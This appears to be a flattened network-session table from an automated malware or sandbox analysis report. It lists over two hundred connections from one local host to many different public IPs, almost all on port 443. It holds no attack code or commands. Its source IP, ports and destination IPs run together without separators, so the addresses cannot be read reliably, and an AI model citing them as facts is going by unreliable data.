                                            12084192.168.2.154426092.161.191.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12085192.168.2.1557266103.63.247.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12086192.168.2.1552376169.130.110.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12087192.168.2.1552048128.127.226.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12088192.168.2.1534868111.115.76.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12089192.168.2.1540714218.94.82.1178080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12090192.168.2.1550052154.8.191.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12091192.168.2.1553284123.188.150.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12092192.168.2.15361908.221.246.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12093192.168.2.1548362187.89.108.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12094192.168.2.1541140101.56.141.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12095192.168.2.155837444.166.144.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12096192.168.2.1535424212.38.176.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12097192.168.2.1547444160.234.129.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12098192.168.2.1533692193.163.29.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12099192.168.2.155704294.129.101.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12100192.168.2.155777875.253.147.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12101192.168.2.154124612.91.109.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12102192.168.2.1558832131.61.24.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12103192.168.2.1538768187.188.156.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12104192.168.2.1547408105.201.86.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12105192.168.2.153697238.195.28.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12106192.168.2.153459620.63.102.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12107192.168.2.1559086126.133.41.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12108192.168.2.1545576125.211.100.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12109192.168.2.153937652.28.136.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12110192.168.2.153833827.247.137.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12111192.168.2.155290244.107.2.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12112192.168.2.1555674139.205.74.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12113192.168.2.155714875.123.242.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12114192.168.2.154401014.4.95.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12115192.168.2.155335252.118.202.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12116192.168.2.1540206211.158.184.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12117192.168.2.15495909.64.207.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12118192.168.2.1557916167.160.63.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12119192.168.2.154190639.145.94.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12120192.168.2.154085695.9.198.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12121192.168.2.1547126149.79.33.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12122192.168.2.154246220.36.189.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12123192.168.2.1559874114.70.192.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12124192.168.2.154460849.8.81.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12125192.168.2.1558872170.163.229.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12126192.168.2.155516079.216.26.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12127192.168.2.155155248.14.10.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12128192.168.2.1547110202.50.134.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12129192.168.2.155784634.78.185.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12130192.168.2.153536669.133.242.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12131192.168.2.1540206107.94.78.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12132192.168.2.156010493.204.214.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12133192.168.2.153757667.69.12.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12134192.168.2.1555894149.78.171.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12135192.168.2.154749264.121.254.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12136192.168.2.155726496.73.250.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12137192.168.2.1535766138.116.138.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12138192.168.2.154771285.112.124.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12139192.168.2.1536892211.54.222.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12140192.168.2.154366231.171.90.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12141192.168.2.154981624.183.53.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12142192.168.2.153900098.22.71.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12143192.168.2.153729225.254.217.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12144192.168.2.1535108212.168.18.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12145192.168.2.153985420.204.208.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12146192.168.2.153850698.42.211.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12147192.168.2.1533750131.110.3.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12148192.168.2.153882461.89.110.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12149192.168.2.155323638.83.88.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12150192.168.2.153824089.249.40.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12151192.168.2.155599444.41.101.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12152192.168.2.1538642219.170.158.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12153192.168.2.153839671.106.76.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12154192.168.2.1544954117.35.202.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12155192.168.2.155679892.214.0.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12156192.168.2.1552856180.127.169.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12157192.168.2.155367220.159.173.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12158192.168.2.1550606189.191.185.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12159192.168.2.154674239.252.36.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12160192.168.2.154938218.32.125.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12161192.168.2.1552780158.251.200.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12162192.168.2.1536624219.200.82.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12163192.168.2.1535756162.78.184.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12164192.168.2.1546132150.78.32.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12165192.168.2.1549320208.238.129.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12166192.168.2.1544384190.233.7.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12167192.168.2.1540232139.68.187.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12168192.168.2.153704251.153.216.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12169192.168.2.1555604197.50.18.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12170192.168.2.1548688196.139.181.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12171192.168.2.155921245.130.107.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12172192.168.2.1558404152.108.23.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12173192.168.2.1560924166.183.207.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12174192.168.2.1556580187.210.208.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12175192.168.2.1549380176.26.82.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12176192.168.2.155545067.247.125.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12177192.168.2.1543784198.240.225.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12178192.168.2.1545144154.0.177.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12179192.168.2.1549772158.237.91.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12180192.168.2.1556470187.125.110.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12181192.168.2.153982212.242.16.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12182192.168.2.1553170129.246.49.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12183192.168.2.1535758207.66.208.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12184192.168.2.1552834223.220.94.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12185192.168.2.155914462.62.48.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12186192.168.2.1548770162.132.103.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12187192.168.2.153782282.47.116.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12188192.168.2.1533970172.241.165.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12189192.168.2.1536706129.173.91.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12190192.168.2.153873650.194.35.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12191192.168.2.154662431.178.204.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12192192.168.2.1538116153.33.226.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12193192.168.2.1553194201.195.127.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12194192.168.2.1540072207.120.103.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12195192.168.2.1538964140.232.218.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12196192.168.2.155324053.187.63.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12197192.168.2.1558782123.71.125.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12198192.168.2.1557774148.45.137.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12199192.168.2.1554648110.150.177.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12200192.168.2.154501239.171.26.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12201192.168.2.1540416198.177.210.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12202192.168.2.1551152190.144.34.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12203192.168.2.1559962173.35.188.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12204192.168.2.153695298.160.187.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12205192.168.2.1538250207.198.43.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12206192.168.2.1538338146.77.190.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12207192.168.2.154327478.64.216.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12208192.168.2.153384070.209.193.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12209192.168.2.1534412222.49.120.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12210192.168.2.155412454.127.240.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12211192.168.2.1543216205.211.139.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12212192.168.2.1537660174.251.79.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12213192.168.2.154623469.195.36.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12214192.168.2.1534132107.144.65.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12215192.168.2.1535570114.49.98.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12216192.168.2.1551664161.51.54.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12217192.168.2.1544706202.2.80.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12218192.168.2.154811839.32.73.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12219192.168.2.1549744123.131.83.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12220192.168.2.1548464222.249.84.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12221192.168.2.153998083.20.19.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12222192.168.2.154098081.185.27.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12223192.168.2.154386475.20.8.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12224192.168.2.1550210100.188.61.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12225192.168.2.1536610129.33.149.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12226192.168.2.1540248154.244.160.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12227192.168.2.153660691.206.153.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12228192.168.2.1539210162.25.182.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12229192.168.2.1555012115.136.145.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12230192.168.2.153660252.141.41.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12231192.168.2.1555294190.26.181.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12232192.168.2.1558970184.96.184.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12233192.168.2.155167248.161.208.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12234192.168.2.1555144164.221.146.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12235192.168.2.1536082205.240.213.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12236192.168.2.1534914209.46.235.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12237192.168.2.15564444.37.12.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12238192.168.2.155454663.26.46.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12239192.168.2.1554292155.196.98.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12240192.168.2.154614283.82.171.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12241192.168.2.1540314124.30.1.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12242192.168.2.1538662194.165.231.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12243192.168.2.1559818104.142.145.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12244192.168.2.15374888.2.124.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12245192.168.2.1553132182.203.25.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12246192.168.2.154273820.4.80.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12247192.168.2.154438423.55.230.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12248192.168.2.1543694157.194.88.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12249192.168.2.153322075.174.112.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12250192.168.2.1533604160.61.177.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12251192.168.2.1560228208.17.195.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12252192.168.2.1545914173.187.71.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12253192.168.2.1559626101.165.108.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12254192.168.2.1547022152.138.102.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12255192.168.2.1538258216.178.185.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12256192.168.2.155180258.182.25.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12257192.168.2.1551570130.247.234.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12258192.168.2.153841476.222.43.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12259192.168.2.1540688106.158.110.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12260192.168.2.1543388128.162.210.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12261192.168.2.1544624157.193.199.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12262192.168.2.1547136138.195.149.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12263192.168.2.1546886190.59.115.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12264192.168.2.1551838168.23.153.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12265192.168.2.154222842.36.154.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12266192.168.2.153679624.245.217.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12267192.168.2.1558244141.196.106.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12268192.168.2.1542874205.136.203.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12269192.168.2.1557866166.135.148.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12270192.168.2.1545636205.107.236.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12271192.168.2.154325831.230.54.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12272192.168.2.155115851.65.230.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12273192.168.2.153357832.113.111.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12274192.168.2.1542718160.0.30.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12275192.168.2.1558208136.50.37.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12276192.168.2.15430408.47.30.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12277192.168.2.1536880221.49.233.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12278192.168.2.153727084.110.175.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12279192.168.2.1558180210.8.179.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12280192.168.2.1548296122.44.123.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12281192.168.2.156045075.6.142.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12282192.168.2.153970631.171.134.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12283192.168.2.1533040169.14.190.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12284192.168.2.1547844134.134.36.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12285192.168.2.155581239.178.34.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12286192.168.2.155501812.1.111.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12287192.168.2.153493249.244.243.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12288192.168.2.1540358163.121.248.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12289192.168.2.153985478.165.141.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12290192.168.2.1533032157.121.32.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12291192.168.2.1556770220.207.218.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12292192.168.2.1559020145.79.52.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12293192.168.2.1549360210.127.36.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12294192.168.2.154620864.164.5.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12295192.168.2.1538770211.209.39.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12296192.168.2.1551704164.51.211.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12297192.168.2.153474098.85.140.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12298192.168.2.1535358143.205.127.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12299192.168.2.1547966149.114.26.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12300192.168.2.1554982154.53.115.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12301192.168.2.1548388164.109.66.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12302192.168.2.1552866209.91.253.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12303192.168.2.1560272159.45.246.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12304192.168.2.1539568108.173.111.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12305192.168.2.1539968169.13.239.65443
                                            TimestampBytes transferredDirectionData


